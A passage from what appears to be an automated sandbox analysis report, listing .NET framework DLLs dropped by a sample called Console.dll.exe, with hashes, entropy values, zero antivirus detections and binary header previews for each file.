                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ov............!......... ............... ....@..........................@............@..................................................%..8....@...(...0..T.......p...............................................................H............text...z........................... ..`.data...i.... ....... ..............@....reloc..T....0.......0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Specialized.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):92320
                                                                                                                                                                                                                        Entropy (8bit):6.374937128407229
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:+sUhBAplrJNzYZuShWN620nCZqZC4WTAiONocgD50MM0prZJs3qsQFnijCz3:+sUhBAp7CZuShWcZLiONocgDa9UVWase
                                                                                                                                                                                                                        MD5:F222B9A24A280C7620A2B4AF4ABB4751
                                                                                                                                                                                                                        SHA1:F1E2278E14AE22A07353B05657F0D10B2349EC36
                                                                                                                                                                                                                        SHA-256:B0BD7EC37A45BBBD7C3604EA5577DBDF034A9EB4DB183DB7EF08ED662CDE9F9E
                                                                                                                                                                                                                        SHA-512:32BDC27D4177E829E49C471697F6F0B93D4B97206857A0DE967C8EC57F608D54D96345BCC6433E6BC399DE95E12BA99A41500CCB5774F2B05F31523ECDBF18E9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!......... ............... ....@..........................@......ZF....@..................................................&..P....@...(...0......4...p...............................................................H............text............................... ..`.data...F.... ....... ..............@....reloc.......0.......0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):239792
                                                                                                                                                                                                                        Entropy (8bit):6.713073682072338
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:DccPQSLvhykdmvTemwSryS1DN4X83FFvcE4G:DccowpykdmZrP6IzV
                                                                                                                                                                                                                        MD5:3FEFA87278425BC7008E9445434EDA54
                                                                                                                                                                                                                        SHA1:72E27C8FD0A65CE445BF38C0155F98EB3572DEC3
                                                                                                                                                                                                                        SHA-256:06F12A34703F9844BCA0481EB4B056606908E7DC0EFE19C4F24DA2BA96094DA2
                                                                                                                                                                                                                        SHA-512:83CC1252733061C3226769ECFA0CE1A9ABCA0160D1604B0CFA5F57BE2E87E856FF801B566771DBB6BCF1367DBA6B640C056ADB1DB7377BC6960A6CEDD0574F06
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....V............!.........`............... ....@..................................`....@.............................................p....<...........(...`..........p...........................................................p...H............text...)........................... ..`.data....2... ...@... ..............@....reloc.......`... ...`..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Annotations.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):186528
                                                                                                                                                                                                                        Entropy (8bit):6.298799814926325
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:dNCS3RjPIQh5GTk9DdCLoxOiOQKspFmMWParD5/oE5bF6bDC4BkoK+JWryNtEl:GS3RjP2Tk9H9PTpFzWPar54BkoK+JWrb
                                                                                                                                                                                                                        MD5:BA4B7D5BAEC680B7A046D1E66B0DFF5B
                                                                                                                                                                                                                        SHA1:D44C7354E63B2355BA4655095F2BD2606D1D8B41
                                                                                                                                                                                                                        SHA-256:B5C13A17F784BC8EDCA253EFB3450013D61F8E24E415D539D80707CE438B9F94
                                                                                                                                                                                                                        SHA-512:522B885CF956EEB7CEBCE3244F7B4E4AA612B7A19CF533AA8E7D85F0EC1920307C08053FFFE1130630095C6383B808DA6FD40F9BCAABB4E79F47BAE6A0AD971B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,............!.....P...P...............`....@......................................@..................................................4...........(..........x!..p...............................................................H............text....D.......P.................. ..`.data....+...`...0...`..............@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.DataAnnotations.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17056
                                                                                                                                                                                                                        Entropy (8bit):6.6533420407603145
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:XGpmblJeIeGXxyYl8WTXWibTb2HRN77/6fR9zjgRc:XGLaf/i09zH
                                                                                                                                                                                                                        MD5:90CAE7AEAE69A01D89F82FAD004D2CF9
                                                                                                                                                                                                                        SHA1:D9EFE98F9207896A9A2EBB94178EABEA6A608C36
                                                                                                                                                                                                                        SHA-256:6A6C2328D3F1919CBD7115BBB2F65105B0315724D931495C6279EDA61917CB93
                                                                                                                                                                                                                        SHA-512:8EC4C8951108682972C50EA0F57C528187DD124CDA818E74DDF3AF3BFA9735DAFC7065BF8658487D92F56D4F82B93F0C06B1757AF554F7D07B172AE06D0BE737
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C............" ..0.................. ...@....... ...............................J....`.....................................O....@...................(...`.......-..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H.......P ...................... -......................................BSJB............v4.0.30319......l.......#~..l.......#Strings....,.......#US.0.......#GUID...@.......#Blob......................3................................+.....S...........................3.......9...O.............}.........}...........$.....A.....d.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):47264
                                                                                                                                                                                                                        Entropy (8bit):5.196471164198263
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:bWTwWifTTZa1IdWBj/D3fM57bQfL9XkWovbJKfCvDXxO88+aEZ4jIwVQBvyW1QUg:0Dlzfw7EBWd88IVq4F/it9zO/f
                                                                                                                                                                                                                        MD5:85D20E23388D25B8955B02FAB8D2C1E0
                                                                                                                                                                                                                        SHA1:7CDA8864AFA3BD85FE6BE57719731EE41989849D
                                                                                                                                                                                                                        SHA-256:98CCFBDC64490D49B5893288E7ACAD0831EEFC015B9743B75AAC146E599DF9A9
                                                                                                                                                                                                                        SHA-512:21C9A325361BA8C989B61801FB63E7CA1D5A95AAA2BB6C8FD0F3875D9104F79E8FB694B852497B008F4F9EE259468841BE7E490E4DF34EB816A00B0157F7E795
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..............!.....`... ...............p....@.................................p.....@.................................................0............(......@.......p...............................................................H............text....P.......`.................. ..`.data...S....p.......p..............@....reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):75936
                                                                                                                                                                                                                        Entropy (8bit):5.9124670043141005
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:Jswg/p4WaQgo2i8dYRmmb4dlI79ZvD2ols2+xetj8iF2z6M:Jswg/p4vYj79xD2om2+xlWM
                                                                                                                                                                                                                        MD5:66038CD6411961E8DE7F43AC5BFDB28D
                                                                                                                                                                                                                        SHA1:71D00E6E5BBD4962305A2EDDFC824CD6E58883EE
                                                                                                                                                                                                                        SHA-256:47DB3189335FA63213C955CBE5B23016A2193ECAB410AC3553B2F0363A13EEF8
                                                                                                                                                                                                                        SHA-512:D5DFE197FB9072BF8D86EBD2128551CC4F268CA6FFFC3241B9E2882D5EC43BDD9FD9EFCD94C22F2D7D1DF9A22782FD54AA21AD6905EB76550194CDA4FAEF55AD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..............!......... ....................@..................................x....@.................................................. ..p........(..........h...p...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):686240
                                                                                                                                                                                                                        Entropy (8bit):6.736028238607136
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:F0LVBGq3r2i++kwEHebAllWw6bq+YDMpBiXxDwDgSsr+lJDAr5chv90:azGqi7+kwEHebA5SRyMpBizSsrUQ5Qa
                                                                                                                                                                                                                        MD5:B2B20F486BCE77AEA4ACDC0195D56C46
                                                                                                                                                                                                                        SHA1:78D478807584B76F5A83D7BA6DD65AED608A0B95
                                                                                                                                                                                                                        SHA-256:D6A0DD732563D4D2E9AF1399FBB30A6799B48289106BC5535A399D750D02B7EC
                                                                                                                                                                                                                        SHA-512:5E3983604D498EF09B8F4DB58C4BFDFD16CA44270C5611C3CEB0E059803869E30F008AEC2F4D6A76E91683F56DAB600205F746064C1C64C20FE142C93D777ADC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^..............!.....0...................@....@..........................P......=.....@.....................................................6...P...(.......f..X<..p...............................................................H............text....).......0.................. ..`.data........@.......@..............@....reloc...f.......p..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):30896
                                                                                                                                                                                                                        Entropy (8bit):4.287115453914408
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:MWz1WiYqMyb7+hN0ACq45kHRN7ny49R9zeTLr:ZgNldny69zELr
                                                                                                                                                                                                                        MD5:C50993DBE2B5D99E599E673921D9001C
                                                                                                                                                                                                                        SHA1:EDBBB19D5F322263CAB868FD3BCB5486BEDAFD8D
                                                                                                                                                                                                                        SHA-256:ED59BFC1B42D9F3072DBFC0C6C87F9EE5013015CADFE8858EA466876FF5C0C9A
                                                                                                                                                                                                                        SHA-512:20F810AC86D2E51CDE85DBF571BD2558B711EFE3CA873AB34F34E27882BEE3019EE2CF81094FBD3087CB492EAAD080AB2EE8561B8405AE9C44E7F8A56EBED815
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W/.............!..... ... ...............0....@..........................P......|.....@..................................................... ....P...(...@..$...(...p...............................................................H............text............ .................. ..`.data........0.......0..............@....reloc..$....@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.ConfigurationManager.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):375912
                                                                                                                                                                                                                        Entropy (8bit):5.984458134179533
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:b28/xHM7l2JzUcq0RmVyiyYWu5nhezpmQiKyTgQ+2/NVQ8GLa0Uh55T3lEC/IOPv:b2ORklOELVIuJhel3Q+2/NVQ8GLa0UhB
                                                                                                                                                                                                                        MD5:70E81BFC1DCCE3AA3AB30C3ABAF3EA53
                                                                                                                                                                                                                        SHA1:2132451E6DC8B1C18568181DDB5D697A491EF7FA
                                                                                                                                                                                                                        SHA-256:4668F89524FCB4D71950E0AD7E0D56E5E5DB2C70E395AD49F7DB6A8164CC50D6
                                                                                                                                                                                                                        SHA-512:37B143C9FF3D06D87B07BD2118A22B48F7DA590E5AE0C03D40A9B9BBBE45A184F091A23FB6CB7CF0FF8BA68E06815078D8E0738CAA4529666E2C98C6F7F057A0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....@..........." ..0.................. ........... ....................................`.................................0...O.......4...............h$.......... ...T............................................ ............... ..H............text... .... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................d.......H......../..T................{............................................((...*..((...*..*..0..1.......(....,..%-.&.*..(.....o)......&...,...o*...,..*.*....................(....,.r...p......%...%...(+...*..(,...*.(....,.r...p......%...%...%...(+...*...(-...*.(....,!r...p......%...%...%...%...(+...*....(....*..,&(....,..r...pr...p.(+...(/...*..(0...*.*.(....,.r...p......%...%...(+...*...(1...*.(....,.r...p......%...%...%...(+...*....(2...*.(....,"r...p......%...%...%...%....(

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19728
                                                                                                                                                                                                                        Entropy (8bit):6.496015564760637
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:4MXTSv/fUNRvGZYdf3zyP/weY+rHsWcNWiATb2HRN7W9R9zFHpe:jQYlO/i29z6
                                                                                                                                                                                                                        MD5:E1BC2D8C7CA716B7ECEC4A50DD9E10ED
                                                                                                                                                                                                                        SHA1:225B7D896F156716055C9AE2AC8525DFB10ED755
                                                                                                                                                                                                                        SHA-256:1C84A54B1C629E278FD72F600B27D3675B32FC5F0759118C21196AE13641466D
                                                                                                                                                                                                                        SHA-512:73576FDC098D61DF76F3231A6150FF70CD20B59C3925164DE09ECB987C7AAC936E6F2CB4C3E7D56A17BDA3FA1449539DECEBFCED39FDC04F77A9274F970509EB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k6............" ..0.............v8... ...@....... ....................................`.................................!8..O....@...............$...)...`......87..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................U8......H.......P ..h....................6......................................BSJB............v4.0.30319......l...h...#~..........#Strings............#US.........#GUID...........#Blob......................3................................h.................2...%.2.........R.......b.....U.....U.....,.....U.....U.....U.....U...3.U.....U.....U.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.C...+.Y...3.o...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Console.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):157856
                                                                                                                                                                                                                        Entropy (8bit):6.404151157883142
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:AoO/mX67cJR50QAuetvH7ARZvcKZF4fJXtq3:1X67cJR505b2ZvcKeh+
                                                                                                                                                                                                                        MD5:9B18A6627B27D2AADAD0D7B2DC42414D
                                                                                                                                                                                                                        SHA1:EB96A2E1FFA11DD3167FCABE69C4768E514DDE95
                                                                                                                                                                                                                        SHA-256:79815E1044AC3F10597A9014D07B2C5AA5A2B7E7DA0299843E3EF1BAE5A5B7F4
                                                                                                                                                                                                                        SHA-512:9CB0BCBD3B63C470101A2E91B85C918CA25FA06EA07242F33141A42D9463882C86277820EC6658BFEDB55098304F5F9C0A967498619C4DF20923973656C7C5B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N.}............!.........@....................@..........................@......r.....@.............................................P...4+.......@...(... ......L...p...........................................................P...H............text............................... ..`.data...B........ ..................@....reloc....... ... ... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Core.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):23816
                                                                                                                                                                                                                        Entropy (8bit):6.307964460404508
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:vS9H4Ay0l9Jr3OzFPhoact/iKMePLexkrW1rU1ZXtW5BEDWN2WitTb2HRN7ESR94:69H4Ay0l9Jr34FPhoact/iKMePLAxiwe
                                                                                                                                                                                                                        MD5:3C0D1372B4E42FFBA7C4EBD1A9EDA2F6
                                                                                                                                                                                                                        SHA1:F99A3F3223425C064F2D136C67A21317CB592E4A
                                                                                                                                                                                                                        SHA-256:4598A1338D54BDBF2F46BD0A9B745D828548A3B79BA94FF2FC0D7D2390436264
                                                                                                                                                                                                                        SHA-512:0F719A273D25295DF89203527ED5F627FF97E34437B5F84C8401B76CD961675EAC4ED2DAF48A62E55B6DD6B6E4C9CBC7D34E72B5DF7C9519E1326011379B372C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-............." ..0..*...........H... ...`....... ..............................C.....`.................................sH..O....`..4............4...)...........G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...4....`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...&...................G......................................BSJB............v4.0.30319......l...<...#~..........#Strings.....$......#US..$......#GUID....$......#Blob......................3......................................................i.......G...........................:.n...J.t.....t...P.................C.....`...............................................).....1.....9.....A.....Q... .Y.....a.....i.....q.....y.....................I.....R.....q...#.z...+.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.Common.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2648240
                                                                                                                                                                                                                        Entropy (8bit):6.838626824349005
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:BLC7Wo3BjTBKRxy/yiNg9cb8mL1ei0L08Rs85hBhJWBjHbkZe:B0q9cb8mL1ei0L08RseWVHYZe
                                                                                                                                                                                                                        MD5:D5F0D1298B05B963F7940F7E7134AD2B
                                                                                                                                                                                                                        SHA1:F8C85D1F24C4603CBA29A32D5350640BF4461144
                                                                                                                                                                                                                        SHA-256:ACA22C0B307C85A55291D8B11B5227C5C238171C4CA68F66441F9CA1D0E7942F
                                                                                                                                                                                                                        SHA-512:34320A7BA07A30192557E1E5E7965A7A3F463518B735EDC3FE79BB29128F21C70C7C93D94ACD0E1CB6EA1C7C65761F747B9C2412D2DBF3502AA50A5C8CA5FAC3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a.N............!......%.. ............... %...@..........................@(......!)...@.............................................p...0Z.......@(..(....&.t.......p...........................................................p...H............text.....%.......%................. ..`.data....q... %...... %.............@....reloc..t.....&.......&.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.DataSetExtensions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.6608413222053695
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:CmoSF/eySW77WiBuWXebPpUNTQHnhWgN7acWB+z5NVAv+cQ0GX01k9z3ApyBE4nN:ZoxW77WiBTb2HRN7yq5NbZR9z3E4n17
                                                                                                                                                                                                                        MD5:A70183EA769381FC761341D879036C70
                                                                                                                                                                                                                        SHA1:725928CCA9F011516CF1003397F28B3C641F96D2
                                                                                                                                                                                                                        SHA-256:6DBF4CF528F85BC5FB2898B7DBF2DE2A93DBD52D0DFC0FD7D1072CCC0C55867E
                                                                                                                                                                                                                        SHA-512:DCC84897E0857C951BA4807FF8C2A7E1BD0C9B165287F2FBE5B28A150BE466EA117799B6149A0757134D78FF62E8B055F7A91F515AA04660326FE5F83254D1F3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............*... ...@....... ..............................Z.....`..................................)..O....@...................)...`.......(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................8(......................................BSJB............v4.0.30319......l...0...#~......@...#Strings............#US.........#GUID...........#Blob......................3................................................E.............|...............i.)...'.).....".....)...~.).....).....).....)...e.).....).....E...........v.....v.....v...).v...1.v...9.v...A.v...I.v...Q.v...Y.v...a.v...i.v...q.v...y.v.......:.....C.....b...#.k...+.....+.....3.....;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.EF6.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):206520
                                                                                                                                                                                                                        Entropy (8bit):6.121139897829129
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:olRykDX+8KI7qTvPAIdF5/UO6KP8cyRL0LB:o/yf84DXn6KP8cz
                                                                                                                                                                                                                        MD5:0F3EE51C596E7557ED49BDDD1E57F7C9
                                                                                                                                                                                                                        SHA1:6B9E56A3F1A4847D1756F7F352EBD695D375BE27
                                                                                                                                                                                                                        SHA-256:4F7CB99BED4C0C2E0E221A9487C7697F8C882E7288FFB993908E592FFF5446D5
                                                                                                                                                                                                                        SHA-512:520BCCE956E752EEF6EF6FDEA1685D4F3A311BAB1BBE9B4DB20EE5F199EA76444D538C6588AE4250ADC2A9E14B1073699C4B41940E6554BE0BEFA04835CEC63C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.f.........." ..0.................. ........... .......................@......Z.....`.....................................O........................T... ......4...8............................................ ............... ..H............text...(.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......................DW..p............................................0..,.......~....s .......o!......r...psn.....r...po"...&.o#...o$....o%....o&...&...r/..po"...&.o'...o(....+A.o)...t.....,...+..r9..po"...&%o*....o%....r?..po"...&o+....o%....o....-....,..o......,*.........or........o,...o"...&.rG..po"...&.o&...&.rQ..po"...&.o-....o%....r_..po....&....o!....(......oo...Q.o/...*......_.M........0..n.......~....s ...%..rc..psn....%r...po"...&.o#...o$....o%...%o&...&%rQ..po"

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):446136
                                                                                                                                                                                                                        Entropy (8bit):6.166664458043378
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:x87lv7mxYhdYzX8/4uqBIbQGEZnFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpA:efhdYzX8/dbMXA
                                                                                                                                                                                                                        MD5:2CD89BD306B2E852F70CBF49C2DD1C92
                                                                                                                                                                                                                        SHA1:8D37E741238CF895E59DD73911F6D6883F9A469E
                                                                                                                                                                                                                        SHA-256:FA3D7678272B10DFA0BE3D959F0AEA38A58B75CAF1BBA06D6781218CED489620
                                                                                                                                                                                                                        SHA-512:CED25645B62D531E5E6CD629BE8DF0BD7859FF2FB52E80C67836A5C50DB011F4EEA017B34EB5005C64CB0E792ED11B716778D1C24D756508F555E42EB758C11F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
